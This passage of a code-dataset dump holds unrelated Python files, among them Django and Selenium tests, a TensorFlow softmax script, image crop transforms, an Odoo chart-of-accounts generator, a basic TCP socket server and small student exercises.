updated by fetching the User\n# # record directly from the database\n#\n# user = User.objects.filter(email='test@example.com').first()\n#\n# assert user.first_name == new_first_name\n# assert user.tagline == new_tagline\n# assert user.bio == new_bio\n#\n#\n# def test_retrieve_single():\n#\n# s, viewer_hid = login_test_user()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.RetrieveSingle'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# assert result['data']['bio'] == 'New Bio'\n# assert result['data']['first_name'] == 'NewName'\n# assert result['data']['viewer_hid'] == viewer_hid\n# assert result['data']['target_hid'] == viewer_hid\n# assert result['data']['tagline'] == 'New Tagline'\n# assert result['data']['avatar_url'] == 'hydra/img/src/user/avatar_7.jpg'\n#\n#\n# def test_retrieve_edit():\n#\n# s, viewer_hid = login_test_user()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.RetrieveEdit'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# assert result['data']['bio'] == 'New Bio'\n# assert result['data']['first_name'] == 'NewName'\n# assert result['data']['viewer_hid'] == viewer_hid\n# assert result['data']['target_hid'] == viewer_hid\n# assert result['data']['tagline'] == 'New Tagline'\n# assert result['data']['avatar_url'] == 'hydra/img/src/user/avatar_7.jpg'\n# assert result['data']['email'] == 'test@example.com'\n\n\ndef test_avatar():\n s, viewer_hid = login_test_user()\n\n result = json.loads(s.post(\n\n url=get_url('ApiHelios.User.AvatarStash'),\n\n files={\n\n 'image': open('/srv/luna/helios/util_test/assets/nasa_moon.jpg', 'rb')\n },\n\n data={\n\n 'target_hid': viewer_hid,\n 'resize_width': 600,\n 'resize_height': 600,\n 'mode': 'avatar'\n }\n\n ).text)\n\n assert result['success'] is True\n\n assert result['data']['x'] == 600\n assert result['data']['y'] == 600\n assert len(result['data']['image']) > 0\n assert len(result['data']['guid']) > 0\n assert 0.0 < float(result['data']['min_crop_x']) < 1.0\n assert 0.0 < float(result['data']['min_crop_y']) < 1.0\n\n result = json.loads(s.post(\n\n url=get_url('ApiHelios.User.AvatarCrop'),\n\n data={\n\n 'target_hid': viewer_hid,\n 'stash_guid': result['data']['guid'],\n 'x1': 10,\n 'y1': 10,\n 'x2': 590,\n 'y2': 590,\n }\n\n ).text)\n\n assert result['success'] is True\n\n assert len(result['data']['avatar_url']) > 0\n","sub_path":"helios/util_test/api_helios/test_geo.py","file_name":"test_geo.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"354594754","text":"import tensorflow as tf\n\ntf.set_random_seed(777) # for reproducibility\nqueue = tf.train.string_input_producer(['data.csv'], shuffle=False, name='queue')\nreader = tf.TextLineReader()\nkey, value = reader.read(queue)\ndefaults = [0.] 
* 17\ndata = tf.decode_csv(value, record_defaults=defaults)\ntrain_x_batch, train_y_batch = tf.train.batch([data[0:-1], data[-1:]], batch_size=4)\nnb_class = 7\n\nX = tf.placeholder(tf.float32, shape=[None, 16])\nY = tf.placeholder(tf.int32, shape=[None, 1])\nY_one_hot = tf.reshape(tf.one_hot(Y, nb_class), [-1, nb_class])\n\nW = tf.Variable(tf.random_normal([16, nb_class]), name='weight')\nb = tf.Variable(tf.random_normal([nb_class]), name='bias')\n\nlogits = tf.matmul(X, W) + b\nhypothesis = tf.nn.softmax(logits)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=Y_one_hot))\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(cost)\n\npredicted = tf.argmax(hypothesis, 1)\nreal = tf.argmax(Y_one_hot, 1)\naccuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, real), dtype=tf.float32))\n\nwith tf.Session() as sess:\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n sess.run(tf.global_variables_initializer())\n\n for step in range(8001):\n x_batch, y_batch = sess.run([train_x_batch, train_y_batch])\n sess.run(optimizer, feed_dict={X: x_batch, Y: y_batch})\n if step % 2000 == 0:\n loss, acc = sess.run([cost, accuracy], feed_dict={X: x_batch, Y: y_batch})\n print(\"STEPS {:5} | Loss {:.3f} | Acc {:.3%}\".format(step, loss, acc))\n\n x_batch, y_batch = sess.run([train_x_batch, train_y_batch])\n pred = sess.run(predicted, feed_dict={X: x_batch})\n for p, y in zip(pred, y_batch.flatten()):\n print(\"[{}] Predictied {} : {} Real Y\".format(p == int(y), p, int(y)))\n\n coord.request_stop()\n coord.join(threads)\n\n","sub_path":"fancy_softmax.py","file_name":"fancy_softmax.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"410081540","text":"from django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom .models import Mineral\n\n\nclass MineralViewTests(TestCase):\n\n def setUp(self):\n self.mineral = Mineral.objects.create(\n name='mineral',\n )\n self.mineral2 = Mineral.objects.create(\n name='mineral2'\n )\n\n def test_mineral_list_view(self):\n resp = self.client.get(reverse('minerals:list'))\n self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral, resp.context['minerals'])\n self.assertIn(self.mineral2, resp.context['minerals'])\n self.assertContains(resp, self.mineral.name)\n self.assertTemplateUsed(resp, 'minerals/index.html')\n\n def test_mineral_detail_view(self):\n resp = self.client.get(reverse('minerals:detail',\n kwargs={'pk': self.mineral.pk}))\n self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral.name, resp.context['properties'].values())\n self.assertContains(resp, self.mineral.name)\n self.assertTemplateUsed(resp, 'minerals/detail.html')\n","sub_path":"minerals/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"295558372","text":"import setuptools\n\nwith open(\"requirements.txt\") as f:\n requirements = [each.strip() for each in f.readlines()]\n\nsetuptools.setup(\n name=\"diff2HtmlCompare\",\n version=\"0.1.0\",\n url=\"https://github.com/wagoodman/diff2HtmlCompare\",\n license=\"MIT\",\n author=\"wagoodman\",\n packages=setuptools.find_packages(),\n install_requires=requirements,\n entry_points={\n \"console_scripts\": [\"diff2HtmlCompare = diff2HtmlCompare:cmd\"]\n 
},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"550970113","text":"#66 Several numbers with a flag (bandeira), using break to interrupt the while loop\r\n\r\ncont=0\r\nsoma=0\r\n\r\nwhile True:\r\n n=int(input('Digite um valor (999 para parar): '))\r\n if n==999:\r\n break\r\n soma+=n\r\n cont+=1\r\nprint(f'A soma dos {cont} valores foi {soma}!')\r\n","sub_path":"Exercícios/ex066.py","file_name":"ex066.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"642125728","text":"from kivy.app import App\r\n\r\nfrom dryfire.model.targetsModel import \\\r\n PaperPlateDryFireTargetModel, BeerCanDryFireTargetModel, \\\r\n HeadDryFireTargetModel, HipsAndHeadDryFireTargetModel, \\\r\n TorsoDryFireTargetModel, ISPCMetricCZoneDryFireTargetModel, \\\r\n ISPCClassicCZoneDryFireTargetModel\r\nfrom dryfire.view.targetSlide import TargetSlide\r\nfrom dryfire.model.persistentData import BGFGsModel\r\n\r\n\r\nclass BGFGsViewModel(object):\r\n \"\"\"\r\n The view model for the BGFGsView class.\r\n \"\"\"\r\n\r\n def __init__(self, view):\r\n self._view = view\r\n self._appdata = App.get_running_app().appdata\r\n self._record_ident = None\r\n self._record = {}\r\n\r\n # view methods\r\n\r\n def v_initialize_view(self):\r\n # initialize view with bgfgs records\r\n bgfgs = self._appdata['bgfgs']\r\n idents = bgfgs.data.keys()\r\n for i in idents:\r\n record = bgfgs.get(i)\r\n self._view.vm_add_bgfg(i, record['description']) \r\n \r\n # step 1 : the user pressed the add a new record button\r\n \r\n def w_handle_create_button_on_press(self, instance):\r\n self._record_ident = None\r\n self._record = self._appdata['bgfgs'].default_record\r\n self.w_colorize()\r\n \r\n # other step 1 : the user selects a bgfg record action\r\n # to edit or delete\r\n \r\n def w_handle_bgfg_record(self, ident):\r\n # the user has selected a bgfg record\r\n self._record_ident = ident\r\n self._record = self._appdata['bgfgs'].get(ident)\r\n self.select_a_bgfg_record_option()\r\n\r\n def select_a_bgfg_record_option(self):\r\n from dryfire.view.bgfgsView import BGFGsView\r\n # offer options for the record\r\n bgfgs = self._appdata['bgfgs']\r\n if bgfgs.count == 1:\r\n self.w_colorize()\r\n else:\r\n options = BGFGsView.commands\r\n self._view.select_options('Options',\r\n options,\r\n options[0],\r\n self.w_handle_bgfgs_record_command,\r\n help='What would you like to do with this record?')\r\n\r\n def w_handle_bgfgs_record_command(self, command):\r\n from dryfire.view.bgfgsView import BGFGsView\r\n if command == BGFGsView.edit_command:\r\n self.w_colorize()\r\n elif command == BGFGsView.delete_command:\r\n ranges = self._appdata['ranges']\r\n if ranges.using_bgfg(self._record_ident):\r\n question = \"You are using this color scheme with some of your\"\\\r\n \" target setups. If you delete this color scheme those target\"\\\r\n \" setups will also be deleted.\\n\"\r\n else:\r\n question = \"\" \r\n # let the user confirm deletion\r\n question += 'Are you sure that you want to '\\\r\n 'delete the color scheme record %s?' 
% (self._record['description'])\r\n self._view.question_yes_no('Delete a Color Scheme Record.',\r\n question,\r\n self.delete_a_bgfg,\r\n back_handler=self.select_a_bgfg_record_option)\r\n else:\r\n self._view.warn(\"Unknown command.\")\r\n\r\n # step 2 : user deletes a bgfg \r\n\r\n def delete_a_bgfg(self, true_false):\r\n if true_false is True:\r\n ident = self._record_ident\r\n bgfgs = self._appdata['bgfgs'] \r\n bgfg_backup = bgfgs.backup() \r\n ok = bgfgs.remove(ident)\r\n if ok:\r\n # delete the ranges records that use the bgfg.\r\n # first get the idents of those ranges\r\n ranges = self._appdata['ranges']\r\n ran_backup = ranges.backup()\r\n ranges_remove_list = ranges.get_idents_using_bgfg(ident)\r\n for i in ranges_remove_list:\r\n ok = ranges.remove(i)\r\n if not ok:\r\n break\r\n if ok:\r\n # ranges were deleted so write the bgfgs and ranges.\r\n # backup, delete, restore if needed\r\n ok, mess = bgfgs.write()\r\n if ok:\r\n ok, mess = ranges.write()\r\n if ok:\r\n self._view.vm_show_bgfg_deleted(ident)\r\n if ok:\r\n ranges_view = self._appdata['ranges_view']\r\n ranges_view.vm_remove_ranges(ranges_remove_list)\r\n else:\r\n bgfgs.restore(bgfg_backup)\r\n ranges.restore(ran_backup)\r\n self._view.message_warn('Unable to delete %s.' % (self._record['description']))\r\n else:\r\n self._view.message_warn('Nothing deleted.')\r\n \r\n # step 2 : user edits a record\r\n # select calibrates one inch\r\n\r\n def w_colorize(self):\r\n kwargs = {}\r\n if self._record_ident is not None:\r\n kwargs['back_handler'] = self.select_a_bgfg_record_option\r\n # let the user select colors\r\n # self._record and self._record_ident are set\r\n self._view.select_bgfg_colors('Select Background and Foreground Colors.',\r\n self._record['bg'],\r\n self._record['fg'],\r\n self.w_handle_on_bgfg_selected)\r\n\r\n def w_handle_on_bgfg_selected(self, bg, fg):\r\n # the user has set the colors.\r\n self._record['bg'] = bg\r\n self._record['fg'] = fg\r\n # next is the description\r\n self.w_enter_description()\r\n \r\n # step 3 : describe the monitor and bgfg\r\n \r\n def w_enter_description(self, **kwargs):\r\n kwargs['back_handler'] = self.w_colorize \r\n self._view.edit_line('Short description.',\r\n 'Enter a short description of the color scheme.',\r\n self._record['description'],\r\n self.w_handle_on_description_enter,\r\n **kwargs)\r\n\r\n def w_handle_on_description_enter(self, description):\r\n # check length\r\n description = description.strip()\r\n if len(description) > 0:\r\n # make sure that the description is not already being used.\r\n bgfgs = self._appdata['bgfgs']\r\n ident = bgfgs.get_ident_using_description(description)\r\n if ident is not None and ident != self._record_ident:\r\n help = 'You are already using the description \"%s\"'\\\r\n ' with another bgfg.' % (description) \r\n self.w_enter_description(help=help)\r\n else:\r\n self._record['description'] = description\r\n self._save_record()\r\n else:\r\n help = 'You did not enter any text.' 
\r\n self.w_enter_description(help=help)\r\n\r\n # non public methods\r\n \r\n def _save_record(self):\r\n bgfgs = self._appdata['bgfgs']\r\n # save the record\r\n backup = bgfgs.backup()\r\n if self._record_ident is None:\r\n ok, ident = bgfgs.add(self._record_ident, self._record)\r\n if ok:\r\n ok, mess = bgfgs.write()\r\n if ok:\r\n self._view.vm_show_bgfg_added(ident, self._record['description'])\r\n else:\r\n ok = bgfgs.set(self._record_ident, self._record)\r\n if ok:\r\n ok, mess = bgfgs.write()\r\n if ok:\r\n self._view.vm_show_bgfg_edited(self._record_ident, self._record['description'])\r\n","sub_path":"windows/dryfire/viewModel/bgfgsViewModel.py","file_name":"bgfgsViewModel.py","file_ext":"py","file_size_in_byte":7733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"359032912","text":"# Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom batchgenerators.augmentations.crop_and_pad_augmentations import center_crop, pad_nd_image_and_seg, random_crop\nfrom batchgenerators.transforms.abstract_transforms import AbstractTransform\nimport numpy as np\n\n\nclass CenterCropTransform(AbstractTransform):\n \"\"\" Crops data and seg (if available) in the center\n\n Args:\n output_size (int or tuple of int): Output patch size\n\n \"\"\"\n\n def __init__(self, crop_size, data_key=\"data\", label_key=\"seg\"):\n self.data_key = data_key\n self.label_key = label_key\n self.crop_size = crop_size\n\n def __call__(self, **data_dict):\n data = data_dict.get(self.data_key)\n seg = data_dict.get(self.label_key)\n data, seg = center_crop(data, self.crop_size, seg)\n\n data_dict[self.data_key] = data\n if seg is not None:\n data_dict[self.label_key] = seg\n\n return data_dict\n\n\nclass CenterCropSegTransform(AbstractTransform):\n \"\"\" Crops seg in the center (required if you are using unpadded convolutions in a segmentation network).\n Leaves data as it is\n\n Args:\n output_size (int or tuple of int): Output patch size\n\n \"\"\"\n\n def __init__(self, output_size, data_key=\"data\", label_key=\"seg\"):\n self.data_key = data_key\n self.label_key = label_key\n self.output_size = output_size\n\n def __call__(self, **data_dict):\n seg = data_dict.get(self.label_key)\n\n if seg is not None:\n data_dict[self.label_key] = center_crop(seg, self.output_size, None)[0]\n else:\n from warnings import warn\n warn(\"You shall not pass data_dict without seg: Used CenterCropSegTransform, but there is no seg\", Warning)\n return data_dict\n\n\nclass RandomCropTransform(AbstractTransform):\n \"\"\" Randomly crops data and seg (if available)\n\n Args:\n crop_size (int or tuple of int): Output patch size\n\n margins (tuple of int): how much distance should the patch border have to the image broder (bilaterally)?\n\n \"\"\"\n\n def __init__(self, crop_size=128, margins=(0, 0, 0), data_key=\"data\", label_key=\"seg\"):\n self.data_key = data_key\n self.label_key = 
label_key\n self.margins = margins\n self.crop_size = crop_size\n\n def __call__(self, **data_dict):\n data = data_dict.get(self.data_key)\n seg = data_dict.get(self.label_key)\n\n data, seg = random_crop(data, seg, self.crop_size, self.margins)\n\n data_dict[self.data_key] = data\n if seg is not None:\n data_dict[self.label_key] = seg\n\n return data_dict\n\n\nclass PadTransform(AbstractTransform):\n def __init__(self, new_size, pad_mode_data='constant', pad_mode_seg='constant',\n np_pad_kwargs_data=None, np_pad_kwargs_seg=None,\n data_key=\"data\", label_key=\"seg\"):\n \"\"\"\n Pads data and seg to new_size. Only supports numpy arrays for data and seg.\n\n :param new_size: (x, y(, z))\n :param pad_value_data:\n :param pad_value_seg:\n :param data_key:\n :param label_key:\n \"\"\"\n self.data_key = data_key\n self.label_key = label_key\n self.new_size = new_size\n self.pad_mode_data = pad_mode_data\n self.pad_mode_seg = pad_mode_seg\n if np_pad_kwargs_data is None:\n np_pad_kwargs_data = {}\n if np_pad_kwargs_seg is None:\n np_pad_kwargs_seg = {}\n self.np_pad_kwargs_data = np_pad_kwargs_data\n self.np_pad_kwargs_seg = np_pad_kwargs_seg\n\n assert isinstance(self.new_size, (tuple, list, np.ndarray)), \"new_size must be tuple, list or np.ndarray\"\n\n def __call__(self, **data_dict):\n data = data_dict.get(self.data_key)\n seg = data_dict.get(self.label_key)\n\n assert len(self.new_size) + 2 == len(data.shape), \"new size must be a tuple/list/np.ndarray with shape \" \\\n \"(x, y(, z))\"\n data, seg = pad_nd_image_and_seg(data, seg, self.new_size, None,\n np_pad_kwargs_data=self.np_pad_kwargs_data,\n np_pad_kwargs_seg=self.np_pad_kwargs_seg,\n pad_mode_data=self.pad_mode_data,\n pad_mode_seg=self.pad_mode_seg)\n\n data_dict[self.data_key] = data\n if seg is not None:\n data_dict[self.label_key] = seg\n\n return data_dict\n\n","sub_path":"batchgenerators/transforms/crop_and_pad_transforms.py","file_name":"crop_and_pad_transforms.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313482566","text":"from rest_framework import serializers\n\nfrom pharmacy.models import Pharmacy, PharmacyAddress\n\n\nclass PharmacySerializer(serializers.ModelSerializer):\n address = serializers.SerializerMethodField(read_only=True)\n\n class Meta:\n model = Pharmacy\n fields = (\"id\", \"user\", \"drugs\", \"website\", \"name\", \"phone\", \"address\")\n\n def get_address(self, obj):\n obj_list = PharmacyAddress.objects.filter(pharmacy=obj)\n if obj_list.exists():\n return PharmacyAddressSerializer(obj_list, many=True).data\n else:\n return None\n\n\nclass PharmacyAddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = PharmacyAddress\n fields = \"__all__\"\n","sub_path":"pharmacy/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"135198568","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution, third party addon\n# Copyright (C) 2004-2015 Vertel AB ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport base64\nimport sys\nsys.path.append('./')\nsys.path.append('../')\nimport traceback\nfrom lxml import etree\n\nimport click\nfrom xlrd import open_workbook\nfrom account_rules import account_rules as Rule\n\n\ndef record(parent, id, model):\n r = etree.SubElement(parent, 'record')\n r.set('id', id)\n r.set('model', model)\n return r\n\ndef field(parent, name, value='', attrs=None):\n f = etree.SubElement(parent, 'field')\n f.set('name', name)\n if value:\n f.text = value\n for attr in attrs or {}:\n f.set(attr, attrs[attr] or 'None')\n return f\n\ndef mk_chart(data,type,name,year,accounts,rule):\n #~ root_account = record(data, '%s_1955_%s' % (type,year), 'account.account.template')\n #~ field(root_account,'name','Bank transfer')\n #~ field(root_account,'code','1955')\n #~ field(root_account,'user_type_id','',{'ref': 'account.data_account_type_current_assets'})\n #~ field(root_account,'reconcile', '', {'eval': 'True'})\n\n exid = 'chart_template_%s_%s' % (type,year)\n ke = record(data, exid, 'account.chart.template')\n field(ke, 'name', name)\n field(ke, 'parent_id', '', {'ref': 'chart_template_general'})\n # ~ field(ke, 'transfer_account_id', '', {'ref': 'chart1955'}) Is gone in odoo12 \n #~ field(ke, 'transfer_account_id', '', {'ref': '%s_1955_%s' % (type,year)})\n field(ke, 'currency_id', '', {'ref': 'base.SEK'})\n field(ke, 'cash_account_code_prefix', '191')\n field(ke, 'bank_account_code_prefix', '193')\n field(ke, 'transfer_account_code_prefix', '195')\n #~ field(ke, 'property_account_receivable_id', '', {'ref': 'chart1510'})\n #~ field(ke, 'property_account_payable_id', '', {'ref': 'chart2440'})\n #~ field(ke, 'property_account_expense_categ_id', '', {'ref': 'chart4000'})\n #~ field(ke, 'property_account_income_categ_id', '', {'ref': 'chart3001'})\n #~ field(ke, 'property_account_expense_id', '', {'ref': 'chart4000'})\n #~ field(ke, 'property_account_income_id', '', {'ref': 'chart3001'})\n field(ke, 'code_digits', '4')\n #~ field(ke, 'tax_template_ids', '', {'eval': \"[(6,0,[ref('%s_mp1'),ref('%s_i')])]\" %(type, type)})\n #~ root_account2 = record(data, '%s_1955_%s' % (type,year), 'account.account.template')\n #~ field(root_account2, 'chart_template_id', '', {'ref': exid})\n\n for account in accounts:\n r = record(data, '%s_%s_%s' % (type,account['code'], year), 'account.account.template')\n field(r, 'name', account['name'])\n field(r, 'code', account['code'])\n field(r, 'user_type_id', '', {'ref': rule.code2user_type_id(account['code'])})\n field(r, 'chart_template_id', '', {'ref': exid})\n if rule.code2note(account['code']):\n field(r, 'note', rule.code2note(account['code']))\n if rule.code2tax_ids(account['code']):\n field(r, 'tax_ids', '', {'eval': rule.code2tax_ids(account['code'])})\n if rule.code2tag_ids(account['code']):\n field(r, 'tag_ids', '', {'eval': rule.code2tag_ids(account['code'])})\n if rule.code2reconcile(account['code']):\n field(r, 'reconcile', '', {'eval': 'True'})\n\n@click.command()\n@click.option('--year', default=2017, help='Year for the Chart of Account.')\n@click.argument('input', 
default='Kontoplan_Normal_2021.xls',type=click.File('rb'))\n@click.argument('output',default='../data/account_chart_template_k23.xml' ,type=click.File('wb'))\n\ndef import_excel(year, input, output):\n wb = open_workbook(file_contents=input.read(), formatting_info=True)\n ws = wb.sheet_by_index(0)\n\n not_k2 = u'[Ej K2]'\n\n k2 = []\n k3 = []\n rule = Rule()\n\n general_accounts = [1410,1510,1630,1650,1910,1920,1930,1955,2440,2610,2611,\n 2612,2613,2614,2615,2616,2618,2620,2621,2622,2623,2624,\n 2625,2626,2628,2630,2631,2632,2633,2634,2635,2636,2638,\n 2640,2641,2642,2643,2644,2645,2646,2647,2648,2649,2650,\n 2660,2710,2730,2760,2850,3000,3001,3002,3003,3004,3740,\n 4000,7000,7500,8990,8999]\n for row in ws.get_rows():\n if type(row[2].value) == float and 1000 <= row[2].value <= 9999 and not row[2].value in general_accounts:\n k3.append({\n 'code': str(int(row[2].value)),\n 'name': row[3].value,\n })\n if row[1].value != not_k2:\n k2.append({\n 'code': str(int(row[2].value)),\n 'name': row[3].value,\n })\n if type(row[5].value) == float and 1000 <= row[5].value <= 9999 and not row[5].value in general_accounts:\n k3.append({\n 'code': str(int(row[5].value)),\n 'name': row[6].value,\n })\n if row[4].value != not_k2:\n k2.append({\n 'code': str(int(row[5].value)),\n 'name': row[6].value,\n })\n\n root = etree.Element('odoo')\n data = etree.SubElement(root, 'data')\n\n mk_chart(data,'K1',u'K1 - Mindre verksamheter',year,k2,rule)\n mk_chart(data,'K2',u'K2 - Små till medelstora verksamheter',year,k2,rule)\n mk_chart(data,'K3',u'K3 - Medelstora till större verksamheter',year,k3,rule)\n mk_chart(data,'K4',u'K4 - större verksamheter / publika företag',year,k3,rule)\n\n # Write file.\n output.write(etree.tostring(root, xml_declaration=True, encoding=\"utf-8\", pretty_print=True))\n\nif __name__ == '__main__':\n import_excel()\n","sub_path":"l10n_se/notnamedbin/bas_account_plan.py","file_name":"bas_account_plan.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"378572600","text":"# -*- coding: utf-8 -*-\nn=int(input('digite um numero'))\n\ncont=0\ni=1\nfor i in range(2,n,1):\n if (i%n==0):\n cont=cont+1\nprint(i)\ni=i+1\n ","sub_path":"moodledata/vpl_data/128/usersdata/227/44257/submittedfiles/al6.py","file_name":"al6.py","file_ext":"py","file_size_in_byte":152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"259551220","text":"import socket\n\n\ndef main():\n\t#1.买一个手机(创建套接字)\n\ttcp_server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n\t#2.插入手机卡(绑定本地信息 bind)\n\ttcp_server_socket.bind((\"\",7891))\n\n\n\t#3.将手机设置为正常的响铃模式(让默认的套接字由主动变为被动 listen)\n\ttcp_server_socket.listen(128)\n\n\twhile True:\n\t\t#4.等待别人的电话到来(等待客户端的连接(客户端调动connect) accept)\n\t\tnew_client_socket,client_addr = tcp_server_socket.accept()\n\t\tprint(client_addr)\n\t\twhile True:\n\t\t\t#5.收到客户端发过来的请求\n\t\t\trecv_data = new_client_socket.recv(1024)\n\n\t\t\t#如果recv 解堵塞,那么有两种情况\n\t\t\t#1.第一种是客服端发送过来数据\n\t\t\t#2.第二种是客服端断开连接\n\t\t\tif recv_data:\n\t\t\t\tprint(recv_data)\n\t\t\t\t#6.回复客户端\n\t\t\t\tnew_client_socket.send(\"dfsfsada\".encode(\"utf-8\"))\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\t\n\t\t\n\t\t#7.关闭套接字\n\t\tnew_client_socket.close()\n\n\ttcp_server_socket.close()\n\n\n\nif __name__ == 
\nif __name__ == '__main__':\n\tmain()","sub_path":"系统学习Python/多任务/Test/04.socket_tcp服务器端.py","file_name":"04.socket_tcp服务器端.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"4927138","text":"import pytest\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException, ElementNotVisibleException\nfrom HW9_PO.page import LoginPage, DashboardPage, ProductPageButtons, ProductEditPage\nfrom HW9_PO.locators import ProductPageLocators\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef login(driver):\n    \"\"\"Log in\"\"\"\n    driver.get('http://localhost/admin')\n    login_page = LoginPage(driver)\n    login_page.login_on_page('admin', 'admin')\n    WebDriverWait(driver=driver, timeout=10).until(ec.title_contains('Dashboard'))\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef select_product_page(driver):\n    try:\n        dashboard_page = DashboardPage(driver)\n        dashboard_page.open_catalog()\n        dashboard_page.open_products()\n    except (NoSuchElementException, ElementNotVisibleException):\n        return print(\"Element is missing or was not found\")\n\n\n@pytest.fixture\ndef product_edit_page(driver):\n    return ProductEditPage(driver)\n\n\n@pytest.fixture\ndef product_page(driver):\n    return ProductPageButtons(driver)\n\n\n@pytest.fixture\ndef add_product(product_edit_page):\n    try:\n        product_name = 'aaaTest_product'\n        tag_title = 'test_tag_title'\n        model_name = 'test_model_name'\n        product_edit_page.add_product(product_name, tag_title, model_name)\n    except (NoSuchElementException, ElementNotVisibleException):\n        return print(\"Element is missing or was not found\")\n\n\n@pytest.fixture\ndef edit_product(product_edit_page):\n    try:\n        new_product_name = 'aaTest'\n        product_edit_page.click_edit_product(new_product_name)\n    except (NoSuchElementException, ElementNotVisibleException):\n        return print(\"Element is missing or was not found\")\n\n\n@pytest.fixture\ndef delete_product(product_page):\n    product_page.delete_product_by_name()\n\n\n@pytest.mark.usefixtures(\"add_product\")\ndef test_add_product():\n    \"\"\"Create a product\"\"\"\n    assert ProductPageLocators.SUCCESS_ALERT\n\n\n@pytest.mark.usefixtures(\"edit_product\")\ndef test_edit_product():\n    \"\"\"Edit a product\"\"\"\n    assert ProductPageLocators.SUCCESS_ALERT\n\n\n@pytest.mark.usefixtures(\"delete_product\")\ndef test_delete_product():\n    \"\"\"Delete a product\"\"\"\n    assert ProductPageLocators.SUCCESS_ALERT\n","sub_path":"HW9_PO/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"407406315","text":"# -*- coding: utf-8 -*-\n########################################### -> MODULES\nfrom math import sqrt\n\n########################################### -> FUNCTIONS\ndef media(lista):\n    MEDIA = sum(lista)/len(lista)\n\n    return MEDIA\n\ndef dp(lista, MEDIA):\n    somat = 0\n\n    for xi in lista:\n        somat += (xi-MEDIA)**2\n\n    DP = sqrt(somat/(len(lista) - 1))\n\n    return DP\n\n########################################### -> MAIN PROGRAM\n\nm = int(input())\nn = int(input())\nlistas = []\nfor i in range(m):\n    lista = []\n    for j in range(n):\n        lista.append(int(input()))\n\n    listas.append(lista)\n\nfor i in listas:\n    print(\"%.2f\"%media(i))\n    print(\"%.2f\"%dp(i, media(i)))\n
